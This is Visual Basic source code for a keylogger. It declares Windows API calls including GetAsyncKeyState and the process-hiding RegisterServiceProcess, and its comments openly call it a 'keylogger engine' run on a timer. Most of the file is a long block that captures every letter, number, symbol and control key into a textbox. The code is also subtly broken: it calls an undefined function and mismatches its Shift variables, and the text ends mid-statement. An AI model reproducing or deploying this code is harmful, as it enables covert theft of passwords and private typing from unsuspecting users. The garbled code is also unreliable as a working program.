Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function RegisterServiceProcess Lib "Kernel32.dll" (ByVal dwProcessId As Integer, ByVal dwType As Integer) As Integer
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32
Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32
‘basic house cleaning for caps and shift key presses so that we accurately record letters as caps or not caps in our main keylogger
Public Function CAPSLOCKON() As Boolean
    If My.Computer.Keyboard.CapsLock = True Then
            Return True
        Else
            Return False
        End If
End Function
Dim mimiNiCapsAmaLa As Integer
Dim Shifter As Integer
‘Keylogger Engine- usually behind your timer ;) ours is a 10 minute space on the highest of our 3 timers and a textbox to pass your data through.
Shifter = GetAsyncKeyState(System.Windows.Forms.Keys.ShiftKey)

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.A)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "A"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "a"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.B)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "B"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "b"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.C)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "C"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "c"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "D"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "d"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.E)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "E"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "e"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "F"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "f"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.G)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "G"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "g"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.H)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "H"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "h"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.I)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "I"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "i"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.J)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "J"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "j"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.K)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "K"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "k"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.L)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "L"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "l"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.M)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "M"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "m"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.N)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "N"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "n"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.O)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "O"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "o"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.P)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "P"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "p"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Q)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "Q"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "q"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.R)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "R"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "r"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.S)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "S"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "s"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.T)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "T"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "t"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.U)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "U"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "u"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.V)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "V"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "v"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.W)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "W"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "w"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.X)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "X"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "x"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Y)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "Y"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "y"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Z)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "Z"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "z"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D1)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "1"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "!"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D2)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "2"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "@"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D3)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "3"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "#"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D4)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "4"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "$"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D5)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "5"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "%"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D6)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "6"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "^"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D7)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "7"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "&"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D8)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "8"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "*"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D9)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "9"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "("
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D0)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "0"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ")"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Back)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[backspace]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Tab)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[tab]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Return)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & vbCrLf
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ShiftKey)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[shift]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ControlKey)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[ctrl]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Menu)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[alt]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Pause)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[pause]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Escape)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[esc]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Space)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & " "
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.End)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[end]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Home)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[home]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Left)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[left]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Right)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[right]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Up)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[up]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Down)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[down]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Insert)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[insert]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Delete)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[Delete]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBAS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ";"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ":"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBBS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "="
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "+"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBCS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ","
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "<"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBDS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "-"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "_"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBES)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "."
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ">"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBFS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "/"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "?"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HC0S)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "`"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "~"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HDBS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "["
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "["
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HDCS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "\"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
